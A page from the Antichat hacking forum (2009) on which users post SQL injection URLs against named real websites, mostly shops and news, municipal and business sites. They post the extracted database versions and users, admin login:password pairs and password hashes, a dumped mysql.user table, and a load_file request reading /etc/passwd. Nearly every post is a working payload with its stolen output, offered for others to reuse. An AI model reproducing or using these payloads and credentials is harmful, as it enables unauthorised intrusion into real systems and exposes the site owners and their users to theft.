ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8261  
Старый 10.03.2009, 16:42
+++AndreyDevil+++
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435

Репутация: 90
По умолчанию

================================================== ==============
http://www.sanctuarystyle.com.au/product.php?id=1+union+select+1,2,3,user(),version (),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27/*
================================================== ==============
Database Version:4.0.24_Debian-10ubuntu2.3-log
Database name:sanctuarystyle
User name:lstefanovski@localhost
================================================== ==============
================================================== ==============
http://www.5startrophies.com.au/product.php?id=1+union+select+1,2,version(),4,5,6/*
================================================== ==============
Database Version: 5.0.45
Database name: fivestars
User name: jowang@localhost
================================================== ==============
http://www.5startrophies.com.au/admin/
5star:kerdan
================================================== ==============
================================================== ==============
http://www.spindriftcreations.com/shop.php?cat=-1+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18+from+INFORMATION_SCHEMA.TABLES+ LIMIT+23,1/*
================================================== ==============
/admin/
mcnux:3ecbed76c9eaf4c11daf20f2985a35f7
================================================== ==============
================================================== ==============

Последний раз редактировалось +++AndreyDevil+++; 19.03.2009 в 22:01..
 
Ответить с цитированием

  #8262  
Старый 10.03.2009, 16:44
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.primariajibou.ro/icanunturi.php?cod=1&id=-53+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4&sid



Database Version: 4.1.22-standard-log
Database name: jibou_web
User name: jibou_usr@localhost
 
Ответить с цитированием

  #8263  
Старый 10.03.2009, 18:26
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.notiprensa.info/noticias/display.php?ID=-24/**/UNION/**/SELECT/**/1,2,concat(grupo_ID,0x3a,grupo_usuario,0x3a,grupo_ password),4,5,6,7,8/**/FROM/**/npcentral.grupos/**//*

http://www.notiprensa.info/noticias/display.php?ID=-24/**/UNION/**/SELECT/**/1,2,concat(user(),0x3a,version()),4,5,6,7,8/**//*
uv0552@localhost:5.0.45-Max
 
Ответить с цитированием

  #8264  
Старый 10.03.2009, 19:22
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.eurobath.ru/?pg=&artid=9999+union+select+1,2,concat_ws(0x 3a,vers ion(),database(),user()),4,5,6--&state=2
Database Version : 5.0.67
Database name : nibs_s_sanmax
User name : nibs_sanmax@srv.nibs.ru
 
Ответить с цитированием

  #8265  
Старый 10.03.2009, 20:01
+++AndreyDevil+++
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435

Репутация: 90
По умолчанию

http://www.swissarmyvehicles.com/vehiclelist.php?cat=-1+union+select+1,2,3,4,5,6,version(),user(),databa se(),10,11,12,13/*
====
Database Version :5.0.33-log
Database name :swissarmy@localhost
User name : swissarmyvehicles_com
====
cmsadmin:AOWonTheRun(Хз где админка.....может кто найдет )
================================================== ==============
http://www.loopeez.co.uk/shop.php?cat=-1+union+select+1,database(),3,4,5,6,7,8,9,10,11,12 ,13,14/*
====
Database Version :5.0.22-log
Database name :loopeezco1
User name : loopeezco1@213.171.218.212
================================================== ==============
http://www.loversandfriends.nl/shop.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17/*
====
Database Version :4.1.21
Database name :loversandfriends
User name : lovers@localhost
================================================== ==============
http://www.gamezworld.de/scripte/newsletter/archive.php?id=-1+UNION+SELECT+1,2,3,4,5,6,version(),8,9,10,11,12, 13,14,15,16,17,18,19--
====
Database Version :5.0.67-community
Database name :db00015995
User name : dbo00015995@h556419
================================================== ==============
http://www.gbwebsols.co.uk/mk7/overview.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9/*
====
Database Version :4.1.22
Database name :gbw247
User name : gbwapplication@localhost
================================================== ==============
http://www.littlewineclub.co.uk/grapevine-news-article.php?id=-1+union+select+1,2,database(),version(),user(),6,7/*
====
Database Version :4.1.20
Database name :wine
User name : lwcwines@localhost
================================================== ==============
http://www.tjs.co.uk/services.php?ID=-1+union+select+1,2,3,version(),5,6,7,8,9,user(),da tabase(),12,13,14/*
====
Database Version :4.1.20-log
Database name :tjs2005
User name : tjs2005@localhost
================================================== ==============
http://www.stauntongardencentre.co.uk/shop/category.php?cid=-1+union+select+1,2,version(),4,5,user(),7,8/*
====
Database Version :4.1.22
Database name :staunton_site
User name : staunton_site@83.223.106.10
================================================== ==============
http://www.globalwaterfoundation.org/news.php?id=-1+union+select+1,user_username,3+FROM+wma_users/*
================================================== ==============
too1s:4what
--------------------------------------------------------------------------------------------------------------------
 
Ответить с цитированием

  #8266  
Старый 10.03.2009, 20:27
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://dalheim.business-consulting-online.info/page.php?id=-14+union+select+1,2,3,concat(user(),0x3a,version() ),5,6,7,8,9,0,1,2,3,4,5,6,7/*

Database Version: 4.1.13
Database name: dalheim
User name: dalheim@localhost
 
Ответить с цитированием

  #8267  
Старый 10.03.2009, 20:28
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.primariapn.ro/index.php?p=evenimentDetalii&id=-67'+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),database(),user()),7,8,9/*


Version : 4.1.20
Database : primarie
User : adminsite@localhost


добавка посту выше

от diznt, нельзя так скули постить.
http://www.superherohype.com/news.php?id=27+AND+ASCII(SUBSTRING((select+y=1..3( )),1,1))>x/*
y1=version()
y2=database()
y3=user()
x1=52,46,49,46,50,50
x2=115,117,112,101,114,104,101,114,95,110,101,120, 116,114,97
x3=115,117,112,101,114,104,101,114,95,110,101,120, 116,114,97,64,115,104,104,45,110,49,45,105,110,116

Version : 4.1.22
Database : superher_nextra
User : superher_nextra@shh-n1-int
 
Ответить с цитированием

  #8268  
Старый 10.03.2009, 21:31
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Pagerank: 4
тИЦ: 300


Код:
http://www.dimex.ru/news.php?n_id=-1+union+select+1,concat_ ws(0x3a,version(),database(),user()),3--
Database Version : 5.0.67
Database name : dimex
User name : root@zvm2.host.ru


юзвери:

Код:
http://www.dimex.ru/news.php?n_id=-1+union+select+1,concat_Ws(0x3a,U_ LOGIN,U _PASS),3+from+USERS+limit+1,1--
--------------------------------------------+

Pagerank: 5
тИЦ: 325

Код:
http://www.vniipo.ru/books/description.php?rowid=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),databa se(),user()),11,12,13,14,15,16,17,18,19--
Database Version : 4.0.27-max-log
Database name : vniipo_orde
User name : vniipo_orde@v3.valuehost.ru


--------------------------------------------+

Pagerank: 4
тИЦ: 325

Код:
http://www.psltd.org/news/news.php?news_id=-1+union+select+1,concat_ws(0x3a,version(),data base(),user()),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19--
Database Version : 4.1.22-standard
Database name : psltd05_spectr
User name : psltd05_sergey@localhost
 
Ответить с цитированием

  #8269  
Старый 10.03.2009, 21:54
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.nepg.info/editor/page.php?id=-9+union+select+1,2,concat(user(),0x3a,version()),4 ,5,6,7/*

Database Version: 5.0.22-log
Database name: nepg
User name: nepgDBuser@localhost

http://www.nepg.info/editor/page.php?id=-9+union+select+1,2,concat(logins,0x3a,user_name,us er_id,0x3a,user_password),4,5,6,7+from+nepg.tbl_us ers+limit+1,1/*

moderator2:0db5a54a73eba82589aa82755271b773
marten4:3239b0589f225fdac005dfe3dd257a48
admin1:0db5a54a73eba82589aa82755271b773
 
Ответить с цитированием

  #8270  
Старый 10.03.2009, 22:47
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

www.intercom.ru

Код:
http://www.intercom.ru/press/index.html?id=-10+union+select+concat(user(),0x3a,database(),0x3a,version()),2,3,4,5--
user(): intercom@localhost
database(): intercom
version(): 4.0.17

PR=4


football.alphatv.ru

Код:
http://football.alphatv.ru/news.html?id=-10+union+select+concat(user(),0x3a,database(),0x3a,version()),2,3,4,5,6,7--
user(): football@localhost
database(): ootball
version(): 5.0.51a-12-log

PR=5

Код:
http://football.alphatv.ru/news.html?id=-10+union+select+concat(user,0x3a,password,0x3a,file_priv),2,3,4,5,6,7+from+mysql.user--
Код HTML:
root:2727417e4e7bb038:Y
root:2301137474663dd6:Y
debian-sys-maint:*0220C5C9224BC30C74598ED193843487AE09BD20:Y
alpha:*BD66B1F6FB23D3DBC4E5DDF5B5FF1A4473950D95:N
forum:19f70f607ae86cfa:N
mnogo:5940e12325c5907f:N
football:30e938253a8a9594:Y
eromantica:035c3a8a4d0471db:N
john:2f0bd6315e3fe4bb:Y
john::Y
sayapin:37072e0b140f7dc7:Y
zavit:23d062547458cc22:N
sphinx:5daa5bb2161dd656:N
teleport2001:4edb331935cd80c4:N
forum2:02b3cef531f2e210:N
bugz::N
football::Y
и наконец читаем /etc/passwd

Код:
http://football.alphatv.ru/news.html?id=-10+union+select+load_file('/etc/passwd'),2,3,4,5,6,7+from+mysql.user--
дерзайте..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ